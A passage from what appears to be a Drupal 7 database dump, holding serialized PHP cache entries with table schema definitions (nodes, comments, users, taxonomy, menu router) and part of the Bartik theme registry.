null\";b:1;s:7:\"default\";s:0:\"\";}}s:7:\"indexes\";a:5:{s:18:\"comment_status_pid\";a:2:{i:0;s:3:\"pid\";i:1;s:6:\"status\";}s:15:\"comment_num_new\";a:5:{i:0;s:3:\"nid\";i:1;s:6:\"status\";i:2;s:7:\"created\";i:3;s:3:\"cid\";i:4;s:6:\"thread\";}s:11:\"comment_uid\";a:1:{i:0;s:3:\"uid\";}s:20:\"comment_nid_language\";a:2:{i:0;s:3:\"nid\";i:1;s:8:\"language\";}s:15:\"comment_created\";a:1:{i:0;s:7:\"created\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"cid\";}s:12:\"foreign keys\";a:2:{s:12:\"comment_node\";a:2:{s:5:\"table\";s:4:\"node\";s:7:\"columns\";a:1:{s:3:\"nid\";s:3:\"nid\";}}s:14:\"comment_author\";a:2:{s:5:\"table\";s:5:\"users\";s:7:\"columns\";a:1:{s:3:\"uid\";s:3:\"uid\";}}}s:6:\"module\";s:7:\"comment\";s:4:\"name\";s:7:\"comment\";}s:4:\"node\";a:7:{s:6:\"fields\";a:14:{s:3:\"nid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:3:\"vid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:0;s:7:\"default\";N;}s:4:\"type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:8:\"language\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:12;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"title\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:3:\"uid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"status\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:1;}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"changed\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"comment\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"promote\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"sticky\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:4:\"tnid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:9:\"translate\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:10:{s:12:\"node_changed\";a:1:{i:0;s:7:\"changed\";}s:12:\"node_created\";a:1:{i:0;s:7:\"created\";}s:14:\"node_frontpage\";a:4:{i:0;s:7:\"promote\";i:1;s:6:\"status\";i:2;s:6:\"sticky\";i:3;s:7:\"created\";}s:16:\"node_status_type\";a:3:{i:0;s:6:\"status\";i:1;s:4:\"type\";i:2;s:3:\"nid\";}s:15:\"node_title_type\";a:2:{i:0;s:5:\"title\";i:1;a:2:{i:0;s:4:\"type\";i:1;i:4;}}s:9:\"node_type\";a:1:{i:0;a:2:{i:0;s:4:\"type\";i:1;i:4;}}s:3:\"uid\";a:1:{i:0;s:3:\"uid\";}s:4:\"tnid\";a:1:{i:0;s:4:\"tnid\";}s:9:\"translate\";a:1:{i:0;s:9:\"translate\";}s:8:\"language\";a:1:{i:0;s:8:\"language\";}}s:11:\"unique keys\";a:1:{s:3:\"vid\";a:1:{i:0;s:3:\"vid\";}}s:12:\"foreign keys\";a:2:{s:13:\"node_revision\";a:2:{s:5:\"table\";s:13:\"node_revision\";s:7:\"columns\";a:1:{s:3:\"vid\";s:3:\"vid\";}}s:11:\"node_author\";a:2:{s:5:\"table\";s:5:\"users\";s:7:\"columns\";a:1:{s:3:\"uid\";s:3:\"uid\";}}}s:11:\"primary key\";a:1:{i:0;s:3:\"nid\";}s:6:\"module\";s:4:\"node\";s:4:\"name\";s:4:\"node\";}s:13:\"node_revision\";a:6:{s:6:\"fields\";a:10:{s:3:\"nid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:3:\"vid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:3:\"uid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:5:\"title\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:3:\"log\";a:3:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:1;s:4:\"size\";s:3:\"big\";}s:9:\"timestamp\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"status\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:1;}s:7:\"comment\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"promote\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"sticky\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:2:{s:3:\"nid\";a:1:{i:0;s:3:\"nid\";}s:3:\"uid\";a:1:{i:0;s:3:\"uid\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"vid\";}s:12:\"foreign keys\";a:2:{s:14:\"versioned_node\";a:2:{s:5:\"table\";s:4:\"node\";s:7:\"columns\";a:1:{s:3:\"nid\";s:3:\"nid\";}}s:14:\"version_author\";a:2:{s:5:\"table\";s:5:\"users\";s:7:\"columns\";a:1:{s:3:\"uid\";s:3:\"uid\";}}}s:6:\"module\";s:4:\"node\";s:4:\"name\";s:13:\"node_revision\";}s:12:\"file_managed\";a:7:{s:6:\"fields\";a:8:{s:3:\"fid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:3:\"uid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:8:\"filename\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:3:\"uri\";a:5:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";s:6:\"binary\";b:1;}s:8:\"filemime\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:8:\"filesize\";a:5:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:3:\"big\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"status\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:9:\"timestamp\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:3:{s:3:\"uid\";a:1:{i:0;s:3:\"uid\";}s:6:\"status\";a:1:{i:0;s:6:\"status\";}s:9:\"timestamp\";a:1:{i:0;s:9:\"timestamp\";}}s:11:\"unique keys\";a:1:{s:3:\"uri\";a:1:{i:0;s:3:\"uri\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"fid\";}s:12:\"foreign keys\";a:1:{s:10:\"file_owner\";a:2:{s:5:\"table\";s:5:\"users\";s:7:\"columns\";a:1:{s:3:\"uid\";s:3:\"uid\";}}}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:12:\"file_managed\";}s:18:\"taxonomy_term_data\";a:6:{s:6:\"fields\";a:6:{s:3:\"tid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:3:\"vid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:4:\"name\";a:5:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";s:12:\"translatable\";b:1;}s:11:\"description\";a:4:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";s:12:\"translatable\";b:1;}s:6:\"format\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:0;}s:6:\"weight\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:11:\"primary key\";a:1:{i:0;s:3:\"tid\";}s:12:\"foreign keys\";a:1:{s:10:\"vocabulary\";a:2:{s:5:\"table\";s:19:\"taxonomy_vocabulary\";s:7:\"columns\";a:1:{s:3:\"vid\";s:3:\"vid\";}}}s:7:\"indexes\";a:3:{s:13:\"taxonomy_tree\";a:3:{i:0;s:3:\"vid\";i:1;s:6:\"weight\";i:2;s:4:\"name\";}s:8:\"vid_name\";a:2:{i:0;s:3:\"vid\";i:1;s:4:\"name\";}s:4:\"name\";a:1:{i:0;s:4:\"name\";}}s:6:\"module\";s:8:\"taxonomy\";s:4:\"name\";s:18:\"taxonomy_term_data\";}s:19:\"taxonomy_vocabulary\";a:6:{s:6:\"fields\";a:7:{s:3:\"vid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:4:\"name\";a:5:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";s:12:\"translatable\";b:1;}s:12:\"machine_name\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:11:\"description\";a:4:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";s:12:\"translatable\";b:1;}s:9:\"hierarchy\";a:5:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:6:\"module\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"weight\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:11:\"primary key\";a:1:{i:0;s:3:\"vid\";}s:7:\"indexes\";a:1:{s:4:\"list\";a:2:{i:0;s:6:\"weight\";i:1;s:4:\"name\";}}s:11:\"unique keys\";a:1:{s:12:\"machine_name\";a:1:{i:0;s:12:\"machine_name\";}}s:6:\"module\";s:8:\"taxonomy\";s:4:\"name\";s:19:\"taxonomy_vocabulary\";}s:5:\"users\";a:7:{s:6:\"fields\";a:16:{s:3:\"uid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:4:\"name\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:60;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"pass\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"mail\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:254;s:8:\"not null\";b:0;s:7:\"default\";s:0:\"\";}s:5:\"theme\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:9:\"signature\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:16:\"signature_format\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:0;}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"access\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:5:\"login\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"status\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:8:\"timezone\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:0;}s:8:\"language\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:12;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:7:\"picture\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:4:\"init\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:254;s:8:\"not null\";b:0;s:7:\"default\";s:0:\"\";}s:4:\"data\";a:4:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";s:9:\"serialize\";b:1;}}s:7:\"indexes\";a:4:{s:6:\"access\";a:1:{i:0;s:6:\"access\";}s:7:\"created\";a:1:{i:0;s:7:\"created\";}s:4:\"mail\";a:1:{i:0;s:4:\"mail\";}s:7:\"picture\";a:1:{i:0;s:7:\"picture\";}}s:11:\"unique keys\";a:1:{s:4:\"name\";a:1:{i:0;s:4:\"name\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"uid\";}s:12:\"foreign keys\";a:1:{s:16:\"signature_format\";a:2:{s:5:\"table\";s:13:\"filter_format\";s:7:\"columns\";a:1:{s:16:\"signature_format\";s:6:\"format\";}}}s:6:\"module\";s:4:\"user\";s:4:\"name\";s:5:\"users\";}s:11:\"menu_router\";a:5:{s:6:\"fields\";a:23:{s:4:\"path\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:14:\"load_functions\";a:2:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:1;}s:16:\"to_arg_functions\";a:2:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:1;}s:15:\"access_callback\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:16:\"access_arguments\";a:2:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;}s:13:\"page_callback\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:14:\"page_arguments\";a:2:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;}s:17:\"delivery_callback\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:3:\"fit\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:12:\"number_parts\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:5:\"small\";}s:7:\"context\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:10:\"tab_parent\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:8:\"tab_root\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"title\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:14:\"title_callback\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:15:\"title_arguments\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:14:\"theme_callback\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:15:\"theme_arguments\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"type\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:11:\"description\";a:2:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:1;}s:8:\"position\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"weight\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:12:\"include_file\";a:2:{s:4:\"type\";s:4:\"text\";s:4:\"size\";s:6:\"medium\";}}s:7:\"indexes\";a:3:{s:3:\"fit\";a:1:{i:0;s:3:\"fit\";}s:10:\"tab_parent\";a:3:{i:0;a:2:{i:0;s:10:\"tab_parent\";i:1;i:64;}i:1;s:6:\"weight\";i:2;s:5:\"title\";}s:21:\"tab_root_weight_title\";a:3:{i:0;a:2:{i:0;s:8:\"tab_root\";i:1;i:64;}i:1;s:6:\"weight\";i:2;s:5:\"title\";}}s:11:\"primary key\";a:1:{i:0;s:4:\"path\";}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:11:\"menu_router\";}s:16:\"date_format_type\";a:5:{s:6:\"fields\";a:3:{s:4:\"type\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;}s:5:\"title\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;}s:6:\"locked\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:7:\"default\";i:0;s:8:\"not null\";b:1;}}s:11:\"primary key\";a:1:{i:0;s:4:\"type\";}s:7:\"indexes\";a:1:{s:5:\"title\";a:1:{i:0;s:5:\"title\";}}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:16:\"date_format_type\";}s:12:\"date_formats\";a:5:{s:6:\"fields\";a:4:{s:4:\"dfid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"not null\";b:1;s:8:\"unsigned\";b:1;}s:6:\"format\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:100;s:8:\"not null\";b:1;s:6:\"binary\";b:1;}s:4:\"type\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;}s:6:\"locked\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:7:\"default\";i:0;s:8:\"not null\";b:1;}}s:11:\"primary key\";a:1:{i:0;s:4:\"dfid\";}s:11:\"unique keys\";a:1:{s:7:\"formats\";a:2:{i:0;s:6:\"format\";i:1;s:4:\"type\";}}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:12:\"date_formats\";}}',0,1423766148,1),('theme_registry:bartik','a:153:{s:9:\"menu_tree\";a:5:{s:8:\"function\";s:16:\"bartik_menu_tree\";s:4:\"type\";s:12:\"theme_engine\";s:10:\"theme path\";s:13:\"themes/bartik\";s:14:\"render element\";s:4:\"tree\";s:20:\"preprocess functions\";a:1:{i:0;s:29:\"template_preprocess_menu_tree\";}}s:30:\"field__taxonomy_term_reference\";a:5:{s:8:\"function\";s:37:\"bartik_field__taxonomy_term_reference\";s:14:\"render element\";s:7:\"element\";s:9:\"base hook\";s:5:\"field\";s:4:\"type\";s:12:\"theme_engine\";s:10:\"theme path\";s:13:\"themes/bartik\";}s:4:\"page\";a:7:{s:8:\"template\";s:4:\"page\";s:4:\"path\";s:23:\"themes/bartik/templates\";s:4:\"type\";s:12:\"theme_engine\";s:10:\"theme path\";s:13:\"themes/bartik\";s:14:\"render element\";s:4:\"page\";s:20:\"preprocess functions\";a:5:{i:0;s:19:\"template_preprocess\";i:1;s:24:\"template_preprocess_page\";i:2;s:21:\"contextual_preprocess\";i:3;s:23:\"overlay_preprocess_page\";i:4;s:24:\"shortcut_preprocess_page\";}s:17:\"process functions\";a:4:{i:0;s:16:\"template_process\";i:1;s:21:\"template_process_page\";i:2;s:11:\"rdf_process\";i:3;s:19:\"bartik_process_page\";}}s:15:\"comment_wrapper\";a:7:{s:8:\"template\";s:15:\"comment-wrapper\";s:4:\"path\";s:23:\"themes/bartik/templates\";s:4:\"type\";s:12:\"theme_engine\";s:10:\"theme path\";s:13:\"themes/bartik\";s:14:\"render element\";s:7:\"content\";s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:35:\"template_preprocess_comment_wrapper\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:16:\"maintenance_page\";a:7:{s:8:\"template\";s:16:\"maintenance-page\";s:4:\"path\";s:23:\"themes/bartik/templates\";s:4:\"type\";s:12:\"theme_engine\";s:10:\"theme path\";s:13:\"themes/bartik\";s:9:\"variables\";a:2:{s:7:\"content\";N;s:13:\"show_messages\";b:1;}s:20:\"preprocess functions\";a:5:{i:0;s:19:\"template_preprocess\";i:1;s:36:\"template_preprocess_maintenance_page\";i:2;s:21:\"contextual_preprocess\";i:3;s:35:\"overlay_preprocess_maintenance_page\";i:4;s:34:\"bartik_preprocess_maintenance_page\";}s:17:\"process functions\";a:4:{i:0;s:16:\"template_process\";i:1;s:33:\"template_process_maintenance_page\";i:2;s:11:\"rdf_process\";i:3;s:31:\"bartik_process_maintenance_page\";}}s:7:\"comment\";a:7:{s:8:\"template\";s:7:\"comment\";s:4:\"path\";s:23:\"themes/bartik/templates\";s:4:\"type\";s:12:\"theme_engine\";s:10:\"theme path\";s:13:\"themes/bartik\";s:14:\"render element\";s:8:\"elements\";s:20:\"preprocess functions\";a:4:{i:0;s:19:\"template_preprocess\";i:1;s:27:\"template_preprocess_comment\";i:2;s:21:\"contextual_preprocess\";i:3;s:22:\"rdf_preprocess_comment\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:4:\"node\";a:7:{s:8:\"template\";s:4:\"node\";s:4:\"path\";s:23:\"themes/bartik/templates\";s:4:\"type\";s:12:\"theme_engine\";s:10:\"theme path\";s:13:\"themes/bartik\";s:14:\"render element\";s:8:\"elements\";s:20:\"preprocess functions\";a:5:{i:0;s:19:\"template_preprocess\";i:1;s:24:\"template_preprocess_node\";i:2;s:21:\"contextual_preprocess\";i:3;s:19:\"rdf_preprocess_node\";i:4;s:22:\"bartik_preprocess_node\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:12:\"user_picture\";a:6:{s:9:\"variables\";a:1:{s:7:\"account\";N;}s:8:\"template\";s:25:\"modules/user/user-picture\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:32:\"template_preprocess_user_picture\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:12:\"user_profile\";a:8:{s:14:\"render element\";s:8:\"elements\";s:8:\"template\";s:25:\"modules/user/user-profile\";s:4:\"file\";s:14:\"user.pages.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/user/user.pages.inc\";}s:20:\"preprocess functions\";a:4:{i:0;s:19:\"template_preprocess\";i:1;s:32:\"template_preprocess_user_profile\";i:2;s:21:\"contextual_preprocess\";i:3;s:27:\"rdf_preprocess_user_profile\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:21:\"user_profile_category\";a:8:{s:14:\"render element\";s:7:\"element\";s:8:\"template\";s:34:\"modules/user/user-profile-category\";s:4:\"file\";s:14:\"user.pages.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/user/user.pages.inc\";}s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:41:\"template_preprocess_user_profile_category\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:17:\"user_profile_item\";a:8:{s:14:\"render element\";s:7:\"element\";s:8:\"template\";s:30:\"modules/user/user-profile-item\";s:4:\"file\";s:14:\"user.pages.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/user/user.pages.inc\";}s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:37:\"template_preprocess_user_profile_item\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:9:\"user_list\";a:4:{s:9:\"variables\";a:2:{s:5:\"users\";N;s:5:\"title\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:8:\"function\";s:15:\"theme_user_list\";}s:22:\"user_admin_permissions\";a:6:{s:14:\"render element\";s:4:\"form\";s:4:\"file\";s:14:\"user.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:8:\"function\";s:28:\"theme_user_admin_permissions\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/user/user.admin.inc\";}}s:16:\"user_admin_roles\";a:6:{s:14:\"render element\";s:4:\"form\";s:4:\"file\";s:14:\"user.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:8:\"function\";s:22:\"theme_user_admin_roles\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/user/user.admin.inc\";}}s:27:\"user_permission_description\";a:6:{s:9:\"variables\";a:2:{s:15:\"permission_item\";N;s:4:\"hide\";N;}s:4:\"file\";s:14:\"user.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:8:\"function\";s:33:\"theme_user_permission_description\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/user/user.admin.inc\";}}s:14:\"user_signature\";a:4:{s:9:\"variables\";a:1:{s:9:\"signature\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:8:\"function\";s:20:\"theme_user_signature\";}s:26:\"update_manager_update_form\";a:6:{s:14:\"render element\";s:4:\"form\";s:4:\"file\";s:18:\"update.manager.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/update\";s:8:\"function\";s:32:\"theme_update_manager_update_form\";s:8:\"includes\";a:1:{i:0;s:33:\"modules/update/update.manager.inc\";}}s:17:\"update_last_check\";a:4:{s:9:\"variables\";a:1:{s:4:\"last\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/update\";s:8:\"function\";s:23:\"theme_update_last_check\";}s:13:\"update_report\";a:4:{s:9:\"variables\";a:1:{s:4:\"data\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/update\";s:8:\"function\";s:19:\"theme_update_report\";}s:14:\"update_version\";a:4:{s:9:\"variables\";a:3:{s:7:\"version\";N;s:3:\"tag\";N;s:5:\"class\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/update\";s:8:\"function\";s:20:\"theme_update_version\";}s:19:\"update_status_label\";a:4:{s:9:\"variables\";a:1:{s:6:\"status\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/update\";s:8:\"function\";s:25:\"theme_update_status_label\";}s:7:\"toolbar\";a:7:{s:14:\"render element\";s:7:\"toolbar\";s:8:\"template\";s:7:\"toolbar\";s:4:\"path\";s:15:\"modules/toolbar\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/toolbar\";s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:21:\"contextual_preprocess\";i:2;s:26:\"toolbar_preprocess_toolbar\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:14:\"toolbar_toggle\";a:4:{s:9:\"variables\";a:2:{s:9:\"collapsed\";N;s:10:\"attributes\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme 